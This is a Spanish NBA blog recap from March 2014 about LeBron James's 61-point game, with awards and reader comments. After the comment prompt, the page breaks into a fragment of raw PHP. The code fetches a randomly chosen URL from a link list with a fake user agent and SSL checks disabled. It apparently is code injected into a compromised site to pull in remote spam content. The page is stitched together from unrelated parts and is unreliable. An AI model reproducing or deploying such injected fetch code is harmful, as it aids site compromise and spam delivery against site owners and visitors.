La Crónica: Career High para Lebron

04 de March de 2014 por Simon

Mereció la pena trasnochar anoche. Sólo asistir en directo a una de las actuaciones más míticas de Lebron James ya compensaba cualquier hora de sueño perdida. Ayer anotó 61 puntos, su tope personal, a los que añadió 7 rebotes y 5 asistencias y el clásico dominio del partido al que ya nos tiene acostumbrados. Los Bobcats fueron víctima de Lebron y a pesar del gran inicio de partido que realizaron y de la super actuación de Al Jefferson, se vieron superados por el dominio de King James y el acierto de los Heat desde el perímetro (107-124). Los 61 puntos suponen un nuevo récord para la franquicia de Florida, hasta ayer en posesión de Glen Rice. Por los Bobcats ésta supone la tercera derrota consecutiva pero es justo remarcar que en los últimos tres encuentros han visitado San Antonio, Oklahoma City y Miami. Y el miércoles les visitan los Pacers. Sin duda, una semana infernal para Charlotte que en sólo 7 días se habrá enfrentado a los  cuatro mejores equipos de la liga.

Otro de los partidos más interesantes de la noche era la visita de los Bulls, en gran estado de forma, a los Nets. El partido se preveía igualado pero terminó resultando una fácil victoria para los locales que volvían a casa tras una larga gira lejos de su pabellón. Los Bulls estuvieron muy desacertados y el excesivo número de pérdidas, traducidas en puntos fáciles para los de Kidd, fueron las que entregaron definitivamente el partido en bandeja a los Nets que con esta victoria vuelven al 50% de victorias-derrotas (80-96). Ojo con estos partidos entre Bulls y Nets porque tienen pinta de repetirse en primera ronda de Play Off. El otro partido entre equipos del Este anoche correspondía al el duelo entre las dos franquicias más decepcionantes de la temporada. Ambas tendrían que estar peleando por la ventaja de campo en Play Off pero se ven luchando, y de lejos, por entrar en la postemporada. Los Knicks, tras un primer cuarto realmente bueno, se desvanecieron en el segundo para nunca más aparecer. Los Pistons fueron de menos a más y en la segunda parte lograron remontar la pequeña desventaja que tenían. New York esperó el ya habitual apagón de los Pistons en el último cuarto pero esta vez no se produjo en gran parte gracias a Will Bynum que anotó 16 puntos en los últimos minutos (85-96). Con esta ya son siete las derrotas consecutivas de los Knicks. 

La gran sorpresa de la jornada la protagonizaron los Lakers que fueron capaces de vencer en el Moda Center a los Portland Trail Blazers. Pau Gasol fue el mejor de su equipo en una victoria que llegó tras un alley opp desde la banda de Bazemore a Johnson que ponía a los visitantes un punto arriba a falta de 6 segundos. Lillard no pudo anotar sobre la bocina por lo que la victoria voló de Portland (106-107). Con este triunfo los Lakers evitan caer al último puesto de la conferencia pues los Sacramento Kings también ganaron anoche. Un ultra efectivo Demarcus Cousins lideró la victoria ante unos Pelicans a los que no nos extrañaría verlos ocupar ese último puesto de aquí a unas semanas. Anthony Davis tuvo uno de los peores partidos de la temporada lo que lastró definitivamente las oportunidades de su equipo (89-96).

El partido entre Wizards y Grizzlies se preveía igualado pero Memphis ofreció su cara más ofensiva y disfrutó de un final de partido relativamente cómodo tras despegarse en el marcador en el tercer cuarto. Tayshaun Prince que fue el líder anotador del partido. Tanta relajación casi les cuesta un disgusto pues los Wizards anotaron 20 puntos en los últimos 3 minutos. Tuvo que ser de nuevo Prince el que con un gran triple enterrara las posibilidades de remontada (110-106).

En el resto de partidos de la jornada, los Wolves ganaron a los Nuggets en uno de los partidos con mayor número de tiros libres de la historia. Presten atención, los Timberwolves dispusieron de ¡64! tiros libres de los que anotaron 52. Los Wolves cimentaron la victoria desde la línea de tiros libres, una victoria que casi se les escapa al final después de llegar a tener ventajas superiores a los 20 puntos en la segunda mitad (132-128). Para terminar, quien siga un poco a los Bucks esta temporada sabrá que en las últimas fechas están en un buen momento de juego aunque no lo refrenden con victorias. Sin embargo,  ayer propinaron un severo correctivo a los Jazz  (88-114).

PREMIOS

MVP: Hasta hace 4 días todos dábamos por hecho de que Kevin Durant se llevaría el MVP. Tocamos la fibra de Lebron James que nos está ofreciendo su mejor baloncesto. Ayer, 61 puntos (máximo de su carrera), 7 rebotes y 5 asistencias. Un vídeo de los que hay que guardar.

Rookie: Nate Wolters superó a Trey Burke. El de los Bucks acabó con 10 puntos, 6 rebotes y 5 asistencias. Un jugador muy serio.

Sorpresa: Ersan Ilyasova solo falló uno de sus 14 lanzamientos a canasta y acabó con 31 puntos. Robin Lopez anotó 19 puntos y más importante: cogió 16 rebotes. Él también es parte fundamental del éxito de los Blazers. Y justo un día después de calificarlo de “ex-jugador” Tayshaun Prince se destapa con 21 puntos y 6 rebotes. Aparte de leer nuestro blog ya podrían hacer algo de publicidad.

Decepción: Muy mal partido de Anthony Davis. Se quedó en 13 puntos tras fallar 10 de 14 lanzamientos y sólo cogió 4 rebotes. Tim Hardaway Jr. falló los 6 tiros que intentó y se quedó sin anotar.

Esfuerzo en vano: Los 38 puntos y 19 rebotes de Al Jefferson son pura anécdota por culpa de la brutalidad de Lebron James. De todas maneras, no vamos a restar nada de crédito a la gran temporada del jugador de los Bobcats.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Albertis dice:
    #1

    En fin, he de resignarme, reconozco que me gustaría ver a Durant dominando la nba (y sigo pensando que con un buen jugador interior lo haría), pero hay que reconocer que este tío está hoy por hoy por encima de cualquiera, no se puede ser mas completo.
    Un saludo.

      Citar

  2. rumbero dice:
    #2

    Se veía venir. Lebron está haciendo lo mismo que la temporada pasada a estas alturas, ya puede estar atento Durant. Y Kidd-Chiflis que sigue dando a Denise motivos para desconfiar de él: 62 puntos de Melo y 61 de Lebron. 😀

    Ver a Prince meter más de 20 puntos es de esas cosas que también hay que valorar. Buena (y demasido sufrida) victoria de los Grizzlies en una pista complicada.

      Citar

  3. Esteban dice:
    #3

    lo de lebron es impresionante, sin dudas tendra su lugar entre los mejores 5 de la historia

    Al jefferson despejando muchas de las tantas dudas que caen sobre el,

      Citar

  4. Ruxixon dice:
    #4

    Los Knicks van apañados si no ganan siquiera a los Pistons del bicharraco de Drummond,cuya actuación ha sido sepultada por los números del “Rey”,17 puntos y 26 rebotes para la criatura,eso si,en unos significativos 46 minutos de juego.NYK acumula 7 derrotas seguidas y tienen el 8º puesto a 6,5 victorias,y en guerra por lo mismo con Cleveland y Detroit.

    Hipotéticamente les llega ahora,después de la visita a los Wolves,su parte más sencilla de calendario:Utah,@Cleveland,Phila,@Boston y Milwaukee.Su última oportunidad.

      Citar

  5. Denise dice:
    #5

    rumbero:
    Se veía venir. Lebron está haciendo lo mismo que la temporada pasada a estas alturas, ya puede estar atento Durant. Y Kidd-Chiflis que sigue dando a Denise motivos para desconfiar de él: 62 puntos de Melo y 61 de

    Jaja, si Kidd-Gilchrist…especialista en tragarse exhibiciones ofensivas en su cara y luego no aportar nada en ataque. Pues ojo, que el proximo partido de Charlotte es ante los Pacers, y Paul George le puede hacer otro roto, aunque este no tiene tanta calidad como para llegar a los 60.

    Para alguién como yo que no ha visto a Jordan salvo en los videos, pero no siguiendo temporadas año a año de él, ya que debía ser bueno el tio como para que Lebron según los entendidos, esté muy por debajo suya, porque joder, Lebron es una puta maquina y para mí el mejor jugador que he visto (sin contar ya digo a Jordan, Magic y gente anterior al 1999 que por edad no he podido verlos).

    Tras la nueva debacle de Knicks y tras presenciar Melo en directo los 17 puntos y 26 rebotitos de Drummond, se le debería pasar por la cabeza al menos, irse a Detroit este verano y juntarse con esa bestia, que ahí si hay mimbres para hacer un equipo ganador durante años…

      Citar

  6. Esteban dice:
    #6

    lo de lebron es temible, puesto que parece que juega sin cansarse y cuando anda con ganas se despacha con 61 puntos, y seamos honestos, no es que lo puede hacer todos los dias, pero el que ve partido de lebron, se da cuenta que si tomara algun tiro forzado o decieira algiuna jugada siendo egoista (¨dos cosas que nunca hace) se podria ir todos los dias a los 40 puntos y no habria forma de detenerle
    simplemtente una fuera de serie

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>